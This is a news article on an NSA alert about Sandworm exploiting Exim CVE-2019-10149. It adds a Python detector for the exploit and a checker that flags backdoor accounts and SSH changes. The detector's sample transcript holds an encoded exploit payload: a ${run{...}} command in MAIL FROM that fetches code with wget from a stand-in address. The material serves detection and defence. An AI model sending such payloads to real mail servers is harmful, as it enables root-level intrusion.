
NSA Warns Russian Hacking Group Targeting Vulnerable Email Systems

The Russian hacking group known as Sandworm has been actively exploiting a vulnerability found in the Exim MTA software for email to launch malicious attacks, according to an NSA alert.

The hacking group known as Sandworm, based in Russia, has been actively exploiting a vulnerability in the Exim Mail Transfer Agent (MTA) email software, according to an alert published by the National Security Agency (NSA) on May 28, 2020.

The group, which the NSA attributes to Russia's military intelligence service (GRU), is also tracked under names such as Voodoo Bear and Telebots, and has been tied to a series of espionage and destructive attacks in both Europe and the US. It should not be confused with Fancy Bear (APT28), a separate GRU-linked group.

In late 2018, Palo Alto Networks researchers warned of a new hacking tool, the Cannon trojan, delivered to government targets in the US and Europe through stealthy, sophisticated spear-phishing; that campaign was attributed to Sofacy (Fancy Bear) rather than Sandworm. Victims only needed to open the attached document, which fetched a remote template, rather than click a link, for the malware to download.

The latest effort targets Exim, a widely deployed MTA on Unix-like systems and the default MTA on some Linux distributions, such as Debian. NSA officials noted that the critical vulnerability, CVE-2019-10149, affects Exim versions 4.87 through 4.91 and was publicly disclosed on June 5, 2019; the flaw is fixed in Exim 4.92 and later. If exploited, a remote attacker can run commands as root on the mail server.

Specifically, a tailored email lets the attacker execute commands with root privileges on the MTA host, which is enough to install programs, modify data and create new accounts. In effect, the attacker can run code of their choosing on the exploited device.

Organizations and users were encouraged to update to the latest version, as older versions are no longer supported. According to the NSA, Sandworm has nonetheless exploited unpatched, public-facing MTAs by placing a command in the "MAIL FROM" field of a Simple Mail Transfer Protocol (SMTP) message, with the command tailored to each target.
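The exploit works because Exim runs the envelope address through its string expander, so a `${run{...}}` expansion item smuggled into MAIL FROM (or RCPT TO, which is where public proof-of-concept code placed it) executes a shell command as root. The following detector, an added example that is not part of the NSA advisory or this article, scans an SMTP transcript for that pattern in either envelope command and decodes the `\xHH` and `\t` escapes that public exploit code used, so an analyst can read the payload. The transcript and the 203.0.113.10 address are constructed for illustration.

```python
"""Flag Exim string-expansion payloads in SMTP envelope commands.

Added example for reviewing captured SMTP traffic or transcripts; it is
not code from the NSA advisory. The sample transcript is constructed.
"""
import re

# The CVE-2019-10149 exploit smuggles an Exim ${run{...}} expansion item
# into the envelope address. Match the operator loosely (whitespace may be
# inserted between tokens) rather than one literal string.
RUN_ITEM_RE = re.compile(r"\$\{\s*run\s*\{", re.IGNORECASE)
ENVELOPE_RE = re.compile(r"^(MAIL FROM|RCPT TO):\s*<?(.*?)>?\s*$", re.IGNORECASE)

# Constructed transcript: one benign transaction followed by an exploit
# attempt in MAIL FROM, encoded the way public PoCs encode it.
SAMPLE_TRANSCRIPT = r"""EHLO mail.example.net
MAIL FROM:<alice@example.net>
RCPT TO:<bob@example.org>
MAIL FROM:<${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x20http\x3A\x2F\x2F203.0.113.10\x2Fx\x22}}@localhost>
RCPT TO:<carol@example.org>"""


def decode_exim_escapes(value: str) -> str:
    """Render the \\xHH, \\t and \\n escapes used in PoC payloads as plain text."""
    def repl(match: re.Match) -> str:
        token = match.group(1)
        if token[0] == "x":
            return chr(int(token[1:], 16))
        return {"t": "\t", "n": "\n"}[token]

    return re.sub(r"\\(x[0-9A-Fa-f]{2}|[tn])", repl, value)


def find_exploit_attempts(transcript: str) -> list:
    """Return one finding per envelope command that carries an expansion.

    Severity "rce" means a ${run{...}} item was seen; "expansion" means some
    other ${...} item, which no legitimate address should contain either.
    """
    findings = []
    for lineno, raw in enumerate(transcript.splitlines(), start=1):
        match = ENVELOPE_RE.match(raw.strip())
        if not match:
            continue
        command, address = match.group(1).upper(), match.group(2)
        if RUN_ITEM_RE.search(address):
            severity = "rce"
        elif "${" in address:
            severity = "expansion"
        else:
            continue
        findings.append({
            "line": lineno,
            "command": command,
            "severity": severity,
            "address": address,
            "decoded": decode_exim_escapes(address),
        })
    return findings


if __name__ == "__main__":
    for hit in find_exploit_attempts(SAMPLE_TRANSCRIPT):
        print(f"line {hit['line']}: {hit['severity']} in {hit['command']}: {hit['decoded']}")
```

Run it over an exported SMTP session from a packet capture or a mail-server debug log; a "rce" hit on a server still running Exim 4.87 to 4.91 should be treated as a likely compromise, and the decoded command gives the download location to look for in the follow-on shell script.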

“When Sandworm exploited CVE-2019-10149, the victim machine would subsequently download and execute a shell script from a Sandworm-controlled domain,” NSA officials explained.

The script then attempts a range of actions: adding privileged accounts, disabling network security settings, updating the SSH configuration to enable additional remote access, and executing a further script to enable follow-on exploitation.

Given the severity, the NSA is urging organizations to install the 2019 software update immediately and ensure the system is running the latest version, 4.93 or newer, to mitigate this and other platform vulnerabilities, as "other vulnerabilities exist and are likely to be exploited... and using a previous version of Exim leaves a system vulnerable to exploitation."

Further, IT and security leaders can use network-based security tools to detect and/or block exploit attempts and any subsequent unauthorized changes. Examining raw traffic logs can also reveal an exploit attempt.

“For example, Snort3 rule 1-50356 alerts on exploit attempts by default for registered users of a Snort Intrusion Detection System (IDS),” NSA officials explained. “Administrators are encouraged to review network security devices protecting Exim mail servers both for identifying prior exploitation and for ensuring network-based protection for any unpatched Exim servers.”

“Other attack methods exist for non-default configurations and may not be detected using these methods,” they continued. “Routinely verifying no unauthorized system modifications, such as additional accounts and SSH keys, have occurred can help detect a compromise.”

Administrators can detect such modifications with file integrity monitoring software, which alerts the administrator to, or blocks, unauthorized changes to the system. As noted by federal agencies and security researchers, a defense-in-depth strategy for all public-facing software, including MTAs, is crucial to preventing these types of exploit attempts.
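The checks the NSA recommends, looking for added accounts, new SSH keys and changed SSH settings, map directly onto the post-exploitation steps described earlier. The following checker, an added example that is not part of the NSA advisory or this article, compares a known-good snapshot of /etc/passwd, root's authorized_keys and sshd_config against the current contents and reports exactly those changes. The file contents, the `mysql_db` backdoor account and the key material are constructed for illustration; on a real host the snapshot would be taken at build time and stored off-box.

```python
"""Compare a baseline snapshot of account and SSH files with current contents.

Added example, not code from the NSA advisory. All file contents below are
constructed; on a real system read them from /etc/passwd,
/root/.ssh/authorized_keys and /etc/ssh/sshd_config and keep the baseline
off the host so an intruder cannot rewrite it.
"""
import hashlib
import re

KEY_TYPES = {"ssh-rsa", "ssh-ed25519", "ecdsa-sha2-nistp256",
             "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521", "ssh-dss"}

# Constructed baseline (known-good build) and current (compromised) contents.
BASELINE = {
    "passwd": ("root:x:0:0:root:/root:/bin/bash\n"
               "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
               "Debian-exim:x:101:103::/var/spool/exim4:/usr/sbin/nologin\n"),
    "authorized_keys": "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBASELINEKEY admin@bastion\n",
    "sshd_config": "Port 22\nPermitRootLogin no\nPasswordAuthentication no\n",
}
CURRENT = {
    # A second uid-0 account with an innocuous-looking name.
    "passwd": BASELINE["passwd"] + "mysql_db:x:0:0::/:/bin/bash\n",
    # An extra key appended to root's authorized_keys.
    "authorized_keys": BASELINE["authorized_keys"]
    + "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCINTRUDERKEY root@localhost\n",
    # sshd reconfigured to allow root logins.
    "sshd_config": "Port 22\nPermitRootLogin yes\nPasswordAuthentication no\n",
}


def digest(text: str) -> str:
    return hashlib.sha256(text.encode()).hexdigest()


def parse_passwd(text: str) -> dict:
    """Map user name to uid and shell; malformed lines are ignored."""
    users = {}
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and not line.startswith("#"):
            users[fields[0]] = {"uid": int(fields[2]), "shell": fields[6]}
    return users


def parse_authorized_keys(text: str) -> set:
    """Return 'type base64' pairs, skipping comments and any leading options."""
    keys = set()
    for line in text.splitlines():
        fields = line.split()
        for i, field in enumerate(fields[:-1]):
            if field in KEY_TYPES:
                keys.add(f"{field} {fields[i + 1]}")
                break
    return keys


def parse_sshd_config(text: str) -> dict:
    """Map lower-cased directive to value; comments are stripped."""
    cfg = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if line:
            parts = re.split(r"[\s=]+", line, maxsplit=1)
            cfg[parts[0].lower()] = parts[1] if len(parts) > 1 else ""
    return cfg


def changed_files(baseline: dict, current: dict) -> list:
    """Cheap integrity check: names of files whose SHA-256 differs."""
    return sorted(n for n in baseline if digest(baseline[n]) != digest(current[n]))


def find_modifications(baseline: dict, current: dict) -> list:
    """Report new accounts, extra uid-0 accounts, new keys and sshd changes."""
    findings = []
    b_users, c_users = parse_passwd(baseline["passwd"]), parse_passwd(current["passwd"])
    for name in sorted(set(c_users) - set(b_users)):
        findings.append(f"new account: {name} (uid {c_users[name]['uid']})")
    for name, info in sorted(c_users.items()):
        if info["uid"] == 0 and name != "root":
            findings.append(f"uid-0 account other than root: {name}")
    new_keys = parse_authorized_keys(current["authorized_keys"]) \
        - parse_authorized_keys(baseline["authorized_keys"])
    for key in sorted(new_keys):
        findings.append(f"new ssh key: {key}")
    b_cfg, c_cfg = parse_sshd_config(baseline["sshd_config"]), parse_sshd_config(current["sshd_config"])
    for directive in sorted(set(b_cfg) | set(c_cfg)):
        if b_cfg.get(directive) != c_cfg.get(directive):
            findings.append(f"sshd_config changed: {directive} {b_cfg.get(directive)!r} -> {c_cfg.get(directive)!r}")
    return findings


if __name__ == "__main__":
    print("changed files:", changed_files(BASELINE, CURRENT))
    for finding in find_modifications(BASELINE, CURRENT):
        print(finding)
```

The hash comparison is what a generic file integrity monitor gives you; the parsed comparison is what tells you whether a change is the specific kind the advisory warns about, so the two are worth running together and on a schedule rather than only after an alert.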

Isolating public-facing MTAs is another critical step, as is using firewall rules to block unexpected traffic and segmenting the network according to roles and requirements.

“When using a DMZ for public Internet facing systems, firewall rules are important to block unexpected traffic from reaching trusted internal resources,” NSA officials explained. “MTAs should only be allowed to send outbound traffic to necessary ports, and unnecessary destination ports should be blocked.

“Least access model firewall rules around a DMZ can inhibit attackers from gaining unauthorized access, as unexpected port traffic should be blocked by default,” they added.
